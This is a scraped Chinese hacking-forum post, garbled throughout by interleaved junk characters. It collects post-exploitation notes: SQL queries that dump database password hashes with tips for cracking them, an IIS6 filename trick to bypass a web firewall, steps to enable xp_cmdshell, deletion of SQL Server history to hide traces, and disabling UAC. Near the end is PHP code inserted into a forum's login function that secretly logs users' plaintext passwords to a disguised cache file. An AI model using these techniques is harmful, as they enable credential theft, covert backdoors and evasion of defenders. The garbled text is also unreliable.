& q3 ^/ t& ]6 N8 ^. e" r( M8 ^就是搜索case ‘login’5 f; p2 ?- d6 m% x, e2 v. B
在它下面直接插入即可,记录的密码生成在pwd.txt中,4 y W- ?" s3 z0 D; D5 S! w, R
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
- @, C. @- ?3 _/ V利用II6文件解析漏洞绕过安全狗代码:8 s7 @+ d4 Q( O$ C& c# o
;antian365.asp;antian365.jpg- |( s+ l# h# d5 H& a8 A, ]4 E0 f9 x0 e
3 d! s) Q, A2 u各种类型数据库抓HASH破解最高权限密码!
3 \+ b9 j2 ?- S* x9 x8 u% J1.sql server2000
4 j9 \; w% ~; [# a/ YSELECT password from master.dbo.sysxlogins where name='sa'
, I- Q" D5 }- B u! [, L/ u0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341) i- l" U2 K& t0 x \
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
3 c0 \1 A$ L! z; Z/ ]$ ]! u" [. i+ t1 T: {8 N8 @, t$ E* `
0×0100- constant header
3 x1 t3 ~/ m; X9 k8 _5 H4 B34767D5C- salt H7 h) ^+ e0 K- A ?9 p: q0 I
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash$ v8 r {: f$ F7 F1 Z
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
+ |, S" s1 }" M$ c6 d" I# T0 ]! rcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
2 B- e+ W: @+ S" y- ~* J* fSQL server 2005:-0 V' x9 X. n! I5 k
SELECT password_hash FROM sys.sql_logins where name='sa'
. T3 c, y( R' f+ M( z" j' o1 l9 S/ u0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F# ^- W( D: z# |/ }# }
0×0100- constant header
; g1 d0 L9 ?' v5 L0 f d993BF231-salt
6 r9 ^/ h K1 ~" M, C$ n5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
& `8 a6 R: l8 d1 }- b* Z' q$ mcrack case sensitive hash in cain, try brute force and dictionary based attacks.( X+ }7 H6 X8 {+ z0 P
4 x; O: I7 o ^" i3 j0 @update:- following bernardo’s comments:-
0 L* G4 h0 t; m& X/ Quse function fn_varbintohexstr() to cast password in a hex string.
/ s, d( {( Q$ I" U- B7 _# M+ A3 Q6 Ge.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins; G' u. u4 W$ r8 H1 M8 Q2 R
$ u6 }: Q4 t. v* P; b3 t! M& O) o( D% NMYSQL:-. F2 X& q5 { T& S/ X( M- f7 @( ~
. G% M' O8 T- ]5 P$ z6 | @
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.8 g* s8 y* \, p
" x- u; {& @2 \# x3 r
*mysql < 4.1+ n4 s) V* T/ H0 P' |+ _7 s
- e$ ^% \; ]" k' h
mysql> SELECT PASSWORD(‘mypass’);
& a5 h) f& m/ e9 F+——————–+
2 T, |1 r3 M: j7 R* }5 i+ f| PASSWORD(‘mypass’) |
4 \, @5 Q0 q6 _ M" @ k+——————–+
& ^7 |% C1 _* ?0 T/ x5 o| 6f8c114b58f2ce9e |
! a1 K4 y0 J" D. q# T$ _+——————–+
: t6 F9 f( A N, ]- i/ K: ?+ h8 Q" u3 S$ q9 h/ b o1 M4 W. e z
*mysql >=4.1
+ @! n# [* d, D
# s; H* c4 k% @mysql> SELECT PASSWORD(‘mypass’);
; ]+ j$ S7 _3 H1 I+——————————————-+5 j0 `9 q- u4 a
| PASSWORD(‘mypass’) |
) A9 y, Y, @" l) B6 A- f" ?% ~& H+——————————————-+
$ d/ q6 F; t9 p* W0 R5 x2 W| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |8 |4 d* f0 g% g6 ?1 n
+——————————————-+
6 P3 p8 X" f$ V0 C* Q
( J$ ?/ V: i+ wSelect user, password from mysql.user
9 A; M% k# |. {$ ~4 gThe hashes can be cracked in ‘cain and abel’
2 l ]" v" ^% y: P6 q: V! i. F( X" \% ]: D* A- a
Postgres:-
, q8 C; ]! i( _9 P9 R5 Y- yPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”) S4 E& }# @9 J
select usename, passwd from pg_shadow;7 t! k+ {3 K; ~# o0 F9 X; _' ?
usename | passwd ]0 w. s3 v( z X6 w
——————+————————————-9 A# f" c( a" l; e, d4 t
testuser | md5fabb6d7172aadfda4753bf0507ed4396$ H! H8 S* L# D+ Q% {
use mdcrack to crack these hashes:-
* S% T% R# U2 i2 L. \, J6 Z$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
0 |7 v( p7 m$ e5 j- U7 }% H) F' @: R7 O( ?7 v: A# I+ q
Oracle:-( \1 n% u0 D4 _. `4 |7 ?5 l
select name, password, spare4 from sys.user$
, J! g( E: t- W7 ^4 F; g- o! ~hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g- K: w6 i8 o% f" T$ Z. X8 Z
More on Oracle later, i am a bit bored….
* t+ C: [- Q, f& a4 P0 v! P) Q$ |7 X r9 N( ~
8 o3 L: k4 h6 e, ]2 Z( P8 m
在sql server2005/2008中开启xp_cmdshell
. j2 j Z6 w/ k-- To allow advanced options to be changed.9 n0 N4 w# j5 L6 ]. E
EXEC sp_configure 'show advanced options', 1
2 M3 Q/ a6 O, F# x/ _; UGO
" q1 ?8 D7 W! ?7 @% j/ P2 j-- To update the currently configured value for advanced options.' D( O* S1 ~$ S! S3 ~
RECONFIGURE0 P; [% G, O, g; a
GO9 R2 [: S I2 _! i2 k# b: r7 M/ ~
-- To enable the feature., j3 u. p+ b6 @4 b
EXEC sp_configure 'xp_cmdshell', 1
/ z) r* V# _3 I: \GO5 c- P. X9 i: s: l( j6 W7 A7 {
-- To update the currently configured value for this feature.7 j( B0 O; Y* Z3 B5 C; C
RECONFIGURE7 n2 V' m2 A5 q% {9 k
GO
8 v! ^8 _% E% Q+ jSQL 2008 server日志清除,在清楚前一定要备份。
5 m$ X* c. C3 V如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
& s( f2 ^6 t# N' g6 _. y8 TX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin. F7 I# L n/ T( u3 m$ R$ [2 O
5 K' Z% V3 o4 \6 n4 w$ M1 Q
对于SQL Server 2008以前的版本:. ]! f8 K, n1 }6 }4 h1 ]
SQL Server 2005:
i/ H1 l' ~4 T0 S( l1 I9 [删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat/ ]8 k$ f. d8 e3 B \) }8 b
SQL Server 2000:9 E* `1 ]' e* V, C2 D# l
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
% ?& u* f5 D) Y/ l
' [$ C, d2 Z$ L本帖最后由 simeon 于 2013-1-3 09:51 编辑
( S9 r5 R0 U, S+ {
5 \$ W. L2 x- O3 E6 ?
5 B( v+ s7 {5 v4 T* \% Uwindows 2008 文件权限修改
0 ]+ g( R8 d# i8 y1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx* \) U* f1 I4 I' ^) O1 y
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
- I0 l; Q3 f& C. u( }% Q一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
! ]7 a% K/ q/ v2 x' t& ~
) f# ~- F2 X) F5 nWindows Registry Editor Version 5.00& ?/ A8 f8 ]% z% ? H9 Y! L7 X4 ]
[HKEY_CLASSES_ROOT\*\shell\runas]: `$ f% f' z) d' X; c9 y* a4 d
@="管理员取得所有权"3 c+ x- Z/ B v
"NoWorkingDirectory"=""
j, Q$ e( b9 H[HKEY_CLASSES_ROOT\*\shell\runas\command]
" A" c& f! u8 w) }# |) y( [@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& |7 d e+ i, r r R( |# `, O& ?
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
) f7 C% L- c( n$ `% }2 K/ j% s[HKEY_CLASSES_ROOT\exefile\shell\runas2]) P; }- I- A# i% Q! z
@="管理员取得所有权"9 [. o+ N, H. A8 p( s3 M
"NoWorkingDirectory"=""
/ \. ^2 W i' \5 H$ ^" T[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]) M# F* s/ q* R3 i/ R. k* Q
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 S% @$ Y+ `4 l"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
4 N" s& @ B6 U6 p% A7 n+ F: z2 L
[HKEY_CLASSES_ROOT\Directory\shell\runas]! Q9 }- S) R; y) f
@="管理员取得所有权"/ u+ z( P+ A* q( O
"NoWorkingDirectory"=""# V- j) P" B/ c; H; r4 p# a
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]( q1 i) O: c* q* B! D0 H
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"& _ u. m- ^# ?2 y; y9 \0 ~5 @
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
# j# u0 p! b8 F+ j
, D; I5 U' S% W4 w$ B# E& x* Q9 [! p% J# Y
win7右键“管理员取得所有权”.reg导入
! P H l' y$ n% D二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
, `+ \7 K! D; _1 m1 X! z1、C:\Windows这个路径的“notepad.exe”不需要替换# ~9 U8 D k0 J- ]& ?$ V2 h8 A
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换. Y& H& u9 \/ j s; c; t' r5 e( m3 a
3、四个“notepad.exe.mui”不要管
6 H' `! \+ G" R" O9 U7 d4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和* ^9 @0 Z, G6 Z8 V4 p& T
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
* f) P0 E& n; g! _2 V" X- X, N替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
; [6 m8 [* F. r) B: y替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
, | B% I+ E+ S0 ~9 d7 ^/ W5 ]. wwindows 2008中关闭安全策略: 9 Q4 l% t4 O2 G3 k( Z3 m
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
" P( a3 i( i5 Z5 P1 F6 g1 A/ n修改uc_client目录下的client.php 在; N4 `6 @" p0 N: U" r' Q
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {7 S; ^/ }1 o5 q+ q$ z) U1 W u5 ?+ T6 o3 @
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
/ H6 t, m1 Q" `9 K* A8 L你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
; Z$ m* d: y6 L8 b) {+ u1 d2 Lif(getenv('HTTP_CLIENT_IP')) {5 f4 q4 T# ^ l9 v) @3 j
$onlineip = getenv('HTTP_CLIENT_IP');
$ g; C! e5 j& ~5 \} elseif(getenv('HTTP_X_FORWARDED_FOR')) {# k9 R+ t- J2 f; B8 t0 K7 {) f4 l
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
4 K: g/ z/ J1 A ~- f& i- ~} elseif(getenv('REMOTE_ADDR')) {
5 b6 q: U& _$ _3 Z# \9 l: _+ n$onlineip = getenv('REMOTE_ADDR');
) \; n; H9 `4 c9 A) s} else {
- R' r+ |* u3 t& E$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
2 O$ K4 H p0 `( F6 J} O$ [: M+ O$ i9 e2 P/ `, i% s# U& w( s
$showtime=date("Y-m-d H:i:s");
3 L6 c7 h7 V% U$ O `8 ] s" U $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
/ Z# K% F5 Q8 t4 o2 B$ \( q" W/ G $handle=fopen('./data/cache/csslog.php','a+');
& L% H1 \1 ~& b# ^; ?& I% l! U $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对